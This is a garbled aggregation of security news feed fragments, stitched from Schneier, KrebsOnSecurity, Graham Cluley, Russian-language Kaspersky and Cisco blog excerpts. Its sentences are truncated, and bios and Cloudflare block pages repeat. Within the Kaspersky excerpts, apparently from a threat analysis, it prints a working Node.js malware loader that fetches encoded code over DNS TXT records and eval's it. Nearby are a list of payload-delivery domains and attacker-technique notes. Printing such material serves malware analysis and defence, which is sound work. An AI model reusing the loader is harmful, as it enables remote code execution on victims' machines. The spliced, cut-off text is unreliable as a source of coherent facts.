A Taxonomy of Access ControlMy personal definition of a brilliant idea is one that is immediately obvious once it’s explained, but no one has thought of it before.

I can’t believe that no one has described this taxonomy of access control before Ittay Eyal laid it out in this paper.

The paper is about cryptocurrency wallet design, but the ideas are more general.

and then build optimal security and reliability to deal with it.

It’s a truly elegant way of conceptualizing the problem.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

A quantum computer uses quantum properties such as superposition, which allows a qubit (a quantum bit) to be neither 0 nor 1, but something much more complicated.

Current quantum computers are still toy prototypes, and the engineering advances required to build a functionally useful quantum computer are somewhere between a few years away and impossible.

(Fun fact: Those three algorithms were broken by the Center of Encryption and Information Security, part of the Israeli Defense Force.

When and if quantum computing becomes a practical reality, we will learn a lot about its strengths and limitations.

Our current understanding of quantum computing architecture will change, and that could easi…

Friday Squid Blogging: New Squid SpeciesSeems like they are being discovered all the time:In the past, the DEEPEND crew has discovered three new species of Bathyteuthids, a type of squid that lives in depths between 700 and 2,000 meters.

The findings were validated and published in 2020.

Another new squid species description is currently in review at the Bulletin of Marine Science.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Posted on August 5, 2022 at 4:13 PM • 78 Comments

SIKE BrokenSIKE is one of the new algorithms that NIST recently added to the post-quantum cryptography competition.

We present an efficient key recovery attack on the Supersingular Isogeny Diffie­-Hellman protocol (SIDH), based on a “glue-and-split” theorem due to Kani.

Our attack exploits the existence of a small non-scalar endomorphism on the starting curve, and it also relies on the auxiliary torsion point information that Alice and Bob share during the protocol.

Our Magma implementation breaks the instantiation SIKEp434, which aims at security level 1 of the Post-Quantum Cryptography standardization process currently ran by NIST, in about one hour on a single core.

Posted on August 4, 2…

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

TheMarkup has an extensive analysis of connected vehicle data and the companies that are collecting it.

The Markup has identified 37 companies that are part of the rapidly growing connected vehicle data industry that seeks to monetize such data in an environment with few regulations governing its sale or use.

While many of these companies stress they are using aggregated or anonymized data, the unique nature of location and movement data increases the potential for violations of user privacy.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

The Department of Homeland Security (DHS) is urging states and localities to beef up security around proprietary devices that connect to the Emergency Alert System — a national public warning system used to deliver important emergency information, such as severe weather and AMBER alerts.

The DHS warning was prompted by security researcher Ken Pyle, a partner at security firm Cybir.

That may be because the patches were included in version 4 of the firmware for the EAS devices, and many older models apparently do not support the new software.

Pyle soon discovered the device contained the private cryptographic keys and other credentials needed to send alerts through Comcast, the nation’s third…

A cybersecurity firm says it has intercepted a large, unique stolen data set containing the names, addresses, email addresses, phone numbers, Social Security Numbers and dates of birth on nearly 23 million Americans.

The largest item in the archive is a 3.6 gigabyte file called “dbfull,” and it contains 28.5 million records, including 22.8 million unique email addresses and 23 million unique SSNs.

Hold Security founder Alex Holden said a number of patterns in the data suggest it relates to AT&T customers.

In contrast, Gmail users made up more than 30 percent of the data set, with Yahoo addresses accounting for 24 percent.

Holden’s team also examined the number of email records that included…

One way to tame your email inbox is to get in the habit of using unique email aliases when signing up for new accounts online.

Here’s a look at the pros and cons of adopting a unique alias for each website.

When you sign up at a site that requires an email address, think of a word or phrase that represents that site for you, and then add that prefaced by a “+” sign just to the left of the “@” sign in your email address.

For instance, if I were signing up at example.com, I might give my email address as [email protected]

What are the downsides to using email aliases, apart from the hassle of setting them up?

Microsoft today released updates to fix a record 141 security vulnerabilities in its Windows operating systems and related software.

Once again, Microsoft is patching a zero-day vulnerability in the Microsoft Support Diagnostics Tool (MSDT), a service built into Windows.

Microsoft says addressing some of the Exchange vulnerabilities fixed this month requires administrators to enable Windows Extended protection on Exchange Servers.

See Microsoft’s blog post on the Exchange Server updates for more details.

“Another critical vulnerability worth mentioning is an elevation of privilege affecting Active Directory Domain Services (CVE-2022-34691),” SANS wrote.

A class action lawsuit has been filed against big-three consumer credit bureau Experian over reports that the company did little to prevent identity thieves from hijacking consumer accounts.

The experiment was done from a different computer and Internet address than the one that created the original account years ago.

It did so without first confirming that new email address could respond to messages, or that the previous email address approved the change.

Experian’s system then sent an automated message to the original email address on file, saying the account’s email address had been changed.

Once I’d changed the PIN and security questions, Experian’s site helpfully reminded me that I hav…

Email scammers sent an Uber to the home of an 80-year-old woman who responded to a well-timed email scam, in a bid to make sure she went to the bank and wired money to the fraudsters.

“I think that’s where she got confused, because she thought the email was about her dishwasher installation,” Hardaway told KrebsOnSecurity.

“The person on the phone told her he was going to lose his job over this transfer error, that he didn’t know what to do.

So they sent her some information about where to wire the money, and asked her to go to the bank.

The FBI says that represents a 74 percent increase in losses over losses reported in 2020.

Compounding the problem, several remaining malware-based proxy services have chosen to block new registrations to avoid swamping their networks with a sudden influx of customers.

Last week, a seven-year-old proxy service called 911[.

The consensus seems to be that those days are now over, and while there are many smaller proxy services remaining, few of them on their own are capable of absorbing anywhere near the current demand.

Spur says SocksEscort’s proxy service relies on software designed to run on Windows computers, and is currently leasing access to more than 14,000 hacked computers worldwide.

Further reading:July 29, 2022: 911 Proxy Service Implodes After Disclosing BreachJuly 28, 2…

Residential proxy services are often marketed to people seeking the ability to evade country-specific blocking by the major movie and media streaming providers.

From a website’s perspective, the IP traffic of a residential proxy network user appears to originate from the rented residential IP address, not from the proxy service customer.

As noted in KrebsOnSecurity’s July 19 story on 911, the proxy service operated multiple pay-per-install schemes that paid affiliates to surreptitiously bundle the proxy software with other software, continuously generating a steady stream of new proxies for the service.

And perhaps other proxy services will spring up to meet what appears to be a burgeoning …

Early on, this rather large volume of IP addresses led many to speculate that Microleaves was just a botnet which was being resold as a commercial proxy service.

At the time, the Microleaves user said their proxy network had 150,000 IPs globally, and was growing quickly.

The CAPTCHA service was offered as an add-on to the Microleaves proxy service, and ranged in price from $20 for a 2-day trial to $320 for solving up to 80 captchas simultaneously.

The exposed Microleaves user database shows that the first user created on the service — username “admin” — used the email address [email protected]

The bulk of Shifter customers who spent more than $100,000 at the proxy service appear to be di…

It’s been seven years since the online cheating site AshleyMadison.com was hacked and highly sensitive data about its users posted online.

The leak led to the public shaming and extortion of many Ashley Madison users, and to at least two suicides.

For starters, after the breach it became clear that a great many of the female Ashley Madison profiles were either bots or created once and never used again.

But the Impact Team had to know that ALM would never comply with their demands to dismantle Ashley Madison and Established Men.

Robert Graham, CEO of Errata Security, penned a blog post in 2015 concluding that the moral outrage professed by the Impact Team was pure posturing.

In a more visceral sense, pig butchering means fattening up a prey before the slaughter.

The most prevalent pig butchering scam today involves sophisticated cryptocurrency investment platforms, where investors invariably see fantastic returns on their deposits — until they try to withdraw the funds.

West said the initial complaints from pig butchering victims came early this year.

It’s like nothing I’ve seen before.”A $5,000,000 LOSSCourtney Nolan, a divorced mother of three daughters, says she lost more than $5 million to a pig butchering scam.

–WhatsApp: In virtually all documented cases of pig butchering, the target is moved fairly quickly into chatting with the scammer via WhatsApp.

From a website’s perspective, the IP traffic of a residential proxy network user appears to originate from the rented residential IP address, not from the proxy service customer.

Residential proxy services are often marketed to people seeking the ability to evade country-specific blocking by the major movie and media streaming providers.

]net launched roughly a year prior to 911 as a “free” public test of the budding new residential proxy service.

They’ll re-upload Photoshop and stuff like that so that it’s backdoored with the 911 proxy.

If maintaining your privacy and anonymity are primary concerns for you as a VPN user, check out Mullvad.net.

The latest Jan. 6 committee hearing on Tuesday examined the role of conspiracy theory communities like 8kun[.

At the same time the committee was hearing video testimony from 8kun founder Jim Watkins, 8kun and a slew of similar websites were suddenly yanked offline.

In late October 2020, a phone call to VanwaTech’s sole provider of connectivity to the Internet resulted in a similar outage for 8kun.

Following that 2020 outage, 8kun and a large number of QAnon conspiracy sites found refuge a Russian hosting provider.

On Sunday, July 10, KrebsOnSecurity contacted Psychz Networks, a hosting provider in Los Angeles, to see if they were aware that they were the sole Internet lifeline for 8kun et.

Microsoft today released updates to fix at least 86 security vulnerabilities in its Windows operating systems and other software, including a weakness in all supported versions of Windows that Microsoft warns is actively being exploited.

Microsoft Office by default warns users that enabling macros in untrusted documents is a security risk, but those warnings can be easily disabled with the click of button.

The zero-day Windows vulnerability already seeing active attacks is CVE-2022-22047, which is an elevation of privilege vulnerability in all supported versions of Windows.

Other components seeing updates this month include Microsoft Defender for Endpoint; Microsoft Edge (Chromium-based); O…

Ransomware is to blame for the closure of all 175 7-Eleven stores in Denmark on Monday.

The retailer closed all of its stores in Denmark after its cash registers and payment systems were brought down in the attack.

That has never happened before.”As Bleeping Computer reports, the company has since confirmed that it was targeted by a ransomware attack, and that it is working with police investigators.

Many of 7-Eleven’s stores in Denmark have since reopened.

7-Eleven is not the first retailer to have found itself with closed stores following a ransomware attack.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Customers of Russian security firm Kaspersky are understandably curious about an email they received yesterday, seemingly from the firm, calling them “dear and lovely”.

Some users have pointed out that the email was received at an email address that they had “only given to Kaspersky.”Did Kaspersky really choose to send an email to its customers addressing them as “dear and lovely”?

Kaspersky is reaching out to the company’s users to inform them of the issue and apologize for the inconvenience caused.

Kaspersky is aware that some users of the company’s products may have recently received emails from the company’s email address with irrelevant content.

This email was sent following a misconfi…

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis.

Hosts:Graham Cluley – @gcluleyCarole Theriault – @caroletheriaultGuest:Maria Varmazis – @mvarmazisShow notes:Sponsored by:Bitwarden – Password security you can trust.

Follow the show:Follow the show on Twitter at @SmashinSecurity, on the Smashing Security subreddit, or visit our website for more episodes.

Remember: Subscribe on Apple Podcasts, or your favourite podcast app, to catch all of the episodes as they go live.

Follow Graham Cluley on Twitter to read more of the exclusive content we pos…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

A $10 million reward is being offered for information leading to the identification or location of malicious hackers working with North Korea to launch cyber attacks on US critical infrastructure.

North Korea has also been publicly named by the US and UK governments as being responsible for the notorious WannaCry malware attack.

You can visit the Rewards for Justice tips line via Tor at: he5dybnt7sr6cm32xt77pazmtm65flqy6irivtflruqfc5ep7eiodiad.onionTips can also be submitted via Signal, Line, Telegram, Viber, and WhatsApp.

Rewards for Justice says that it reads every tip it receives, and that messages can be sent in multiple languages.

More information (which can be accessed via a regular w…

Graham Cluley Security News is sponsored this week by the folks at Keeper Security.

Keeper Connection Manager (KCM) provides DevOps and IT teams with effortless access to RDP, SSH, databases and Kubernetes endpoints through a web browser.

KCM is an agentless remote desktop gateway that can be installed in any on-premise or cloud environment.

KCM significantly enhances security by enabling organizations to adopt zero-trust remote access to IT infrastructure, which the majority of VPNs do not support, with features such as least-privilege access, role-based access control (RBAC) and multi-factor authentication (MFA).

If you’re interested in sponsoring my site for a week, and reaching an IT-sa…

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Paul Ducklin.

Hosts:Graham Cluley – @gcluleyCarole Theriault – @caroletheriaultGuest:Paul Ducklin – @duckblogShow notes:Sponsored by:Bitwarden – Password security you can trust.

Follow the show:Follow the show on Twitter at @SmashinSecurity, on the Smashing Security subreddit, or visit our website for more episodes.

Remember: Subscribe on Apple Podcasts, or your favourite podcast app, to catch all of the episodes as they go live.

Follow Graham Cluley on Twitter to read more of the exclusive content we post.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This isn’t the normal behaviour of the German-based security testing service.

See more Our English-language Twitter account "avtestorg" has been hacked and we no longer have access to the account or tweets at the moment.

— AV-TEST GmbH (DE) (@avtestde) July 25, 2022Over 12 hours have passed, and Twitter does not appear to have given AV-Test its account back.

Earlier this month, for instance, the official account of the British Army suffered a similar fate.

We shouldn’t be too quick to blame instantly the owner of a Twitter account after a hack.

In this special edition of the “Smashing Security” podcast, computer security veterans Graham Cluley and Carole Theriault welcome back author and journalist Jamie Bartlett – host of “The Missing CryptoQueen” podcast.

Hosts:Graham Cluley – @gcluleyCarole Theriault – @caroletheriaultGuest:Jamie Bartlett – @JamieJBartlettShow notes:Sponsored by:Bitwarden – Password security you can trust.

Cyber Security Inside podcast -bringing you the most important and timely security topics as well as other industry experts for insightful conversations.

Follow the show:Follow the show on Twitter at @SmashinSecurity, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cl…

Three million Android users may have lost money and had their devices infected by spyware, after the discovery that the official Google Play store has been distributing apps infected by a new family of malware.

Affected apps include Funny Camera by KellyTech (which has been installed over 500,000 times from the Google Play Store) and Razer Keyboard & Theme by rxcheldiolola (more than 50,000 installs).

Turn on Google Play Protect – Google’s built-in malware protection for Android, which automatically scans your device.

Download your apps from official sources, such as the Google Play Store – not unofficial app stores.

This wouldn’t have helped in this particular case, but as a general rule t…

We regret to inform you that due to force majeure, Bexplus will stop service from now on.

So, how long do you have to withdraw any cryptocurrency funds you might have deposited at Bexplus?

Please complete the withdrawal within 24 hours after 14:00:00 (UTC) on July 18, 2022, after which the website will close the withdrawal function.

Ummm.. so Bexplus gave its users only 24 hours to withdraw their funds.

The 24 hours is already up.

Более того, напоминаем, что большинство разрешений у приложений можно отозвать в любой момент.

13 июля, незадолго до того, как новая сводка о приватности приложений стала обязательной, в сети заметили одно маленькое изменение: в описаниях приложений в магазине появился раздел «Безопасность данных», а вот списки разрешений из них пропали.

Однако «Безопасность данных» и «Разрешения приложений» рассказывают совсем не об одном и том же.

Следует, впрочем, уточнить, что пропал только список разрешений в описаниях приложений в Google Play.

Сначала внимательно изучите, какие данные будет собирать о вас приложение, в разделе «Безопасность данных» в Google Play.

DogWalk (она же CVE-2022-34713) — RCE-уязвимость в MSDTСамая опасная из свежезакрытых уязвимостей, CVE-2022-34713, потенциально допускает удаленное выполнение постороннего кода (относится к типу RCE).

CVE-2022-34713 — это уязвимость в инструменте Microsoft Windows Support Diagnostic Tool (MSDT), как и нашумевшая в мае этого года Follina.

Другие уязвимости, на которые стоит обратить особое вниманиеВторая уязвимость нулевого дня, закрытая в минувший вторник, — CVE-2022-30134 — содержится в Microsoft Exchange.

О ней также было известно до того, как Microsoft подготовила патч, но пока вроде бы в дикой природе эта уязвимость не эксплуатировалась.

Причем это не единственная проблема в Exchange, и…

Стартует конференция Black Hat 2022, и мы решили спросить наших экспертов из Глобального центра исследования и анализа угроз (GReAT), чего они ждут прежде всего.

Также будет немало докладов о киберфизических системах, в том числе об устройствах Siemens, о средствах удаленной разблокировки дверей автомобиля, защищенной радиосвязи и о многом другом.

Я бы ожидал услышать больше о наступательной безопасности в контексте угроз для систем машинного обучения и в сфере криптовалют.

Широкое пересечение этих тем с текущей повесткой показывает, что цифровой и реальный мир тесно переплетены и что кибербезопасность играет все большую роль в обеспечении безопасности физической.

Борис Ларин, ведущий иссле…

Злоумышленники используют зловред DTrack и шифровальщик Maui для атак на предприятия по всему миру.

В июне американское Агентство по кибербезопасности и защите инфраструктуры сообщало, что шифровальщик Maui атакует в основном компании и государственные организации, работающие в сфере здравоохранения в США.

Однако наши специалисты также обнаружили как минимум одну атаку на жилищную компанию в Японии и несколько дополнительных жертв в Индии, Вьетнаме и России.

В другом — им удалось скомпрометировать сервер Weblogic через эксплойт к уязвимости CVE-2017-10271, что также в итоге помогло им запустить посторонний скрипт.

Кроме того, полезно заранее продумать стратегию защиты от шифровальщиков и ме…

Для нашей истории важно, что в конце девяностых Интернет перестал быть местом для избранных: в 2000 году в сеть выходили уже сотни миллионов людей.

С древних времен макросы поддерживались и в Microsoft Word, например для автоматической генерации отчетов на основе данных, введенных в форму.

Проблема широко обсуждалась в прессе, а в США даже проводились слушания в сенате.

Еще в 1995 году, внедрив простейшее предупреждение в Microsoft Word («этот документ содержит макросы»), компания получила негативные отзывы от клиентов.

Старый вирус, современные проблемыЭпидемия ILOVEYOU подняла множество вопросов, актуальных в сфере информационной безопасности и по сей день.

Позднее организация Centre for Applied Internet Data Analysis показала статистику за 19 июля, которая хорошо демонстрирует скорость распространения Code Red.

Взгляд из 2022 годаПроисшествия, подобные Code Red, происходят и по сей день, но чаще всего они связаны с уязвимостями нулевого дня.

Code Red не эксплуатировал уязвимость zero-day — она была обнаружена и закрыта за месяц до эпидемии.

Еще одно важное отличие Code Red от современных атак — отсутствие какой-либо «монетизации».

Однако Code Red и прочие многочисленные вредоносные программы, заражавшие сотни тысяч систем по всему миру, отчасти помогли сформировать те подходы к корпоративной безопасности, которыми мы руководствуемся сейчас.

Самые популярные пакеты еженедельно скачиваются миллионами программистов и лежат в основе многих разработок — от любительских проектов до известных технологических стартапов.

А вот и более свежий пример: 26 июля 2022 года наши исследователи обнаружили новую угрозу, появившуюся в репозитории npm, которую они назвали LofyLife.

Снабженные вредоносным кодом пакеты использовались для типовых задач, таких как форматирование заголовков, или для встраивания в программы некоторых игровых функций.

Как защититься от вредоносных пакетовРепозитории позволяют любому пользователю публиковать свои собственные пакеты, и никто не может дать гарантий их безопасности.

Это означает, что в таких средах обязатель…

Режим получил название Lockdown Mode, и он серьезно ограничивает функциональность смартфона, планшета или ноутбука.

Lockdown Mode в деталяхДо конца этого года, с выпуском новых версий операционной системы, в вашем смартфоне или планшете Apple (если он сравнительно современный, то есть выпущен не ранее 2018 года) в настройках появится возможность активировать режим Lockdown Mode.

Но эта функция может использоваться и для кражи данных, так как предоставляет администратору MDM широкие полномочия по контролю над устройством.

В общем, Lockdown Mode звучит как хорошая идея.

В дополнение к режиму Lockdown Mode (а пока эта функция недоступна — вместо него) наши эксперты предложили еще несколько рек…

И, как обычно, все из-за безалаберности одного сотрудника, который представляется как «ведущий безопасник этого уровня».

Внутри она заходит в какой-то зал с терминалами и с одного из них успешно входит в систему, аутентифицируясь с помощью своего ID-цилиндра.

Дальше дело техники — у Талы есть доступ и к схемам крепости, и к управлению подводным шлюзом, через который она и впускает Кеноби.

Правящий дом АльдераанаСемейство Органа, правящее Альдерааном, отдельно вызывает кучу вопросов своим странным отношением к безопасности — информационной и не только.

Тем более, что, как показано в этом же сериале, технологии удаленного определения местоположения дроида вполне себе существуют и используются.

Наши исследователи изучили современную версию руткита CosmicStrand, вредоносной программы, которую они обнаружили в модифицированной прошивке UEFI.

Как и кого заражал CosmicStrandВ случае CosmicStrand обнаруженные нашими исследователями жертвы были, как ни странно, обычными людьми, пользующимися нашим бесплатным антивирусом.

Что делает CosmicStrandОсновное предназначение CosmicStrand — при запуске компьютера загружать на него вредоносную программу, которая уже будет выполнять задачи, поставленные злоумышленниками.

Еще с 2016 года CosmicStrand успешно работает на злоумышленников, практически не привлекая внимания исследователей безопасности.

Во-первых, это образец сложного и дорогого вредоно…

Надежная защита от киберугроз нужна каждой компании, но важно понимать, что антивирус— это не лекарство от всех болезней.

У истоков большинства атак на компании стоит человеческая ошибка: какой-то сотрудник нажал на вредоносную ссылку, активировал макрос, скачал зараженный файл, и еще масса подобных вариантов.

Вымогатели, но не шифровальщикиНедавно в Интернете опубликовали новость об активности Luna Moth — группировки, специализирующейся на воровстве корпоративных данных и шантаже.

Формально RAT — это не вредоносная программа, поэтому большинство антивирусов ее пропускают, и далеко не все предупреждают пользователя о потенциальной опасности.

Поэтому продуманная стратегия киберзащиты должна …

Axie Infinity вышла на рынок в 2018 году и быстро завоевала популярность среди пользователей.

На пике развития ее доходность для игроков была так велика, что некоторые жители Юго-Восточной Азии начали зарабатывать себе на жизнь исключительно игрой в Axie Infinity.

Для расчетов в экосистеме Axie Infinity используется внутриигровая валюта Smooth Love Potion (SLP), построенная на основе блокчейна Ethereum.

Он успешно прошел все «этапы отбора» и в итоге, как и положено, получил заветный оффер в виде PDF-файла.

Спустя месяц нагрузка уменьшилась, и от помощи Axie DAO отказались — но права на одобрение транзакций не отозвали, что и сыграло на руку киберпреступникам.

Рассылая фишинговые письма или вредоносные вложения, злоумышленники используют множество уловок, которые, по их мнению, должны убедить вас перейти по ссылке или открыть вложение.

Если вы работаете в компании хотя бы неделю, то наверняка это не первое полученное вами электронное письмо.

Но если отправитель якобы работает в вашей компании, то как его корпоративный адрес может не быть в списке доверенных?

На самом деле современные почтовые фильтры работают совершенно противоположным образом: если пометки и ставятся, то, наоборот, на опасные, а не на безвредные письма.

И в случае с Outlook из Office 365 ставятся такие пометки — как правило, не в тело письма, а в специальные рабочие поля.

В последнее время все больше вымогательских группировок пишет шифровальщики, атакующие не только компьютеры с Windows, но и устройства с Linux и виртуальные машины ESXi.

Недавно наши эксперты исследовали еще два только появившихся в даркнете зловреда с аналогичной функциональностью — Black Basta и Luna.

Black Basta — шифровальщик для ESXiШифровальщик Black Basta впервые был обнаружен в феврале этого года.

Он существует в двух версиях, для Windows и Linux, причем последняя нацелена в первую очередь на шифрование образов виртуальных машин ESXi.

Он написан на Rust и способен шифровать устройства с Windows, Linux и образы виртуальных машин ESXi.

(Feed generated with FetchRSS)

;T1078 Valid Accounts;Партнеры BlackCat могут приобретать доступ к сетевой инфраструктуре жертвы на специализированных теневых площадках.

;T1497 Virtualization/Sandbox Evasion;В ALPHV MORPH для противодействия анализу, в том числе и в песочнице, проверяется значение параметра командной строки access-token.

TA0011 Command and Control;T1071 Application Layer Protocol;Применяемые атакующими средства удаленного доступа могут использовать протоколы прикладного уровня (HTTP, HTTPS, DNS).

;T1572 Protocol Tunneling;Для доступа к скомпрометированной системе атакующие могут использовать туннели, построенные с использованием ngrok или gost.

;T1498 Network Denial of Service ;При отказе жертвы выплачива…

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

Фрагмент SideWinder.AntiBot.Script из https://finance.pakgov[.

]net/salary-a4222e91 function buttonClick() { if (navigator.geolocation) { navigator.geolocation.getCurrentPosition(showPosition); } else { x.innerHTML = 'Geolocation is not supported by this browser.

'; } } function showPosition(position) { alert(`lat ${position.coords.latitude} long ${position.coords.longitude}`); }

let C = 0, P = "", K = "lin9gtmn", R = () => { require("dns").resolveTxt("0x" + C + "."

+ K + ".eccbc8[.

]com", (e, d) => { if (d) { if (P += d.join(""), C++, C < 23) return R(); try { eval(global.dec(K, P)) } catch (a) {} } }) }; R()

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

а по совместительству одним из самых значимых людей в отечественной форензике — Игорем Михайловым.

С моим опытом написания постов в блог такой формат подходил мне лучше всего.

Весь процесс написания занял у нас около полугода.Как-то мне в LinkedIn написал менеджер Packt и сказал, что они планируют выпустить третье издание «Practical Mobile Forensics».

Книга эта была мне очень знакома, я читал оба издания, и во многом именно они дали отличную базу, которая позволила мне работать с мобильными устройствами.

Третья книга "Learning Android Forensics: Analyze Android devices with the latest forensic tools and techniques" должна помочь глубоко погрузиться в анализ подобных мобильных устройств.

(Feed generated with FetchRSS)

(Feed generated with FetchRSS)

]xyz Domain Payload Delivery 6Y[.

]rE Domain Payload Delivery doem[.

]Re Domain Payload Delivery bpyo[.

]IN Domain Payload Delivery l5k[.

]xYZ Domain Payload Delivery uQW[.

Now let’s go over the different types of security solutions.

That being said, there are a few questions you can ask yourself to find the cybersecurity solution that best fits your needs, including:What are our security goals?

This will also help determine whether to manage your cybersecurity solution yourself or have a third-party run it for you.

These questions will help guide your decision-making process and give you the information you need to make an informed decision on your cybersecurity solution.

For more details on the different endpoint security acronyms and how to determine the right solution for your organization, keep an eye out for the next blog in this series – Unscrambling Cy…

Over her 25-year-plus career, Saleema Syed has seen the information security industry from a variety of vantage points, all while championing women in technology.

“I fell in love with the culture, the kindness, the heart of this company,” Syed said.

I’ve been extremely lucky at Duo, Cisco and Webex that I’ve been around those kinds of people.

How do we enable children and women to be more open to technology and being part of the technology field?

Join UsTo learn more about Webex, Cisco and Duo Security and how you can apply your passion, advocacy and problem solving to make a difference in cybersecurity, browse our open roles.

We’re excited to announce Cisco Secure Client, formerly AnyConnect, as the new version of one of the most widely deployed security agents.

As the unified security agent for Cisco Secure, it addresses common operational use cases applicable to Cisco Secure endpoint agents.

You no longer need to deploy and manage Secure Client and Secure Endpoint as separate agents, making management more effortless on the backend.

If you choose to use cloud management, Secure Client policy and deployment configuration are done in the Insights section of Cisco SecureX.

Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco and AWS demonstrate shared responsibility that identifies Security “of” the Cloud versus Security “in” the Cloud.

Shared responsibility remains central to every cloud initiative and defines how cloud providers and customers work together to achieve maximum security across all aspects of the cloud.

While shared responsibility is a common term, surprisingly few people understand the model and fewer still have implemented it correctly.

New playbooks from trusted vendors and cloud providers are available to help security teams implement layered approaches to securing their organizations.

More Cisco and AWS blogs:• Cisco and AWS: Securing your resilience in a hybrid cloud world• Securing Y…

In these customer conversations, cloud security and network security are often discussed in unison.

Validating our commitment to hybrid-multicloud security, Cisco has received the AWS Security Competency Partner designation for Network and Infrastructure Security.

Now demoing at AWS Re:Inforce: Cisco Secure Firewall as-a-service on AWSThis week at AWS Re:Inforce, customers can stop by our booth to see our latest firewall innovation.

Additional ResourcesProduct page: Cisco Secure Firewall for Public CloudPartner page: Cisco solutions on AWSBlog: Securing cloud is everyone’s responsibilityQuick Start page: Cisco solutions on AWSAmazon Partner Network page: Cisco solutions on AWS2022 Global Hy…

These accomplishments have lead them to be selected from over more than 700 Cisco Cybersecurity Advocates – who are also members of Cisco Insider Advocates – to join the League of Cybersecurity Heroes.

Cisco Insider Advocates is a peer networking community developed several years ago for Cisco customers around the globe.

Tony’s involvement with the Cisco community shows how no distance is too far for a motivated cybersecurity professional.

Wouter is an active participant in the cybersecurity community, working with an almost evangelical zeal towards sharing the importance of holistic cybersecurity.

Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

For Stephanie Frankel the journey to Cisco Secure was circuitous.

Duo’s security education allowed Frankel to understand the industry and is something she values for getting more people into the cybersecurity field.

At Duo and Cisco Secure, employees come from a variety of backgrounds and some don’t have much (or any) experience with cybersecurity.

Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social ChannelsInstagramFacebookTwitterLinkedInShareShare:

Through our Security Outcomes Study, Volume 2, we were able to benchmark how companies around the world are doing when it comes to cyber resilience.

Recent blog posts have taken a look at security resilience in the EMEA and Americas regions, and this post assesses resilience in Asia Pacific, Japan and China (APJC).

While the Security Outcomes Study focuses on a dozen outcomes that contribute to overall security program success, for this analysis, we focused on four specific outcomes that are most critical for security resilience.

There are many factors that could contribute to these small differences when it comes to security resilience.

Improving resilience in APJCThe Security Outcomes Stu…

A deep dive into the latest updates from Secure Network and Cloud Analytics that show Cisco’s leadership in the Security Industry.

Across the Cisco Security Portfolio, Secure Network Analytics (SNA) and Secure Cloud Analytics (SCA) have continued to add value for their customers since their inception by innovating their products and enhancing their capabilities.

This SNA feature brings a simplified, intuitive and clear analytics experience to Secure Network Analytics users.

The core additions revolve around additional detections and context, as well as usability and integration enhancements, including those in Secure Cloud Insights.

And Secure Analytics will be there, to pioneer and lead th…

No, Ransomware attacks are not random.

And this is not an isolated case – Comparitech published a story ‘Ransomware attacks on US schools and colleges cost $3.56bn in 2021’ and outlined how threat actors have evolved with their ransomware attacks on schools and colleges.

Resiliency must be a critical outcome for any security solution and Cisco Secure Endpoint is built to stop hackers at the point of entry.

With Cisco Secure Endpoint Pro we are equipped to assist with the responsibility of monitoring your endpoints for cyberattacks.

The secure endpoint agent is deployed, sits on the school endpoint freeing up time from a stretched thin IT department.

Cisco Secure MSP was born.

Secure MSP center was launched in the US market in November 2021 and MSPs across America have been rapidly transacting their business on MSP Center.

Here’s a refresher of Secure MSP Center –It is a lightning fast and direct buying experience of SaaS security- No invoicing.

Cisco Umbrella’s market-leading DNS security is currently available with more SaaS security products coming soon.

So, how does Cisco Secure MSP work?

The past couple of years have brought security resilience to the forefront.

In a previous blog post, we assessed security resilience in Europe, Middle East, and Africa (EMEA).

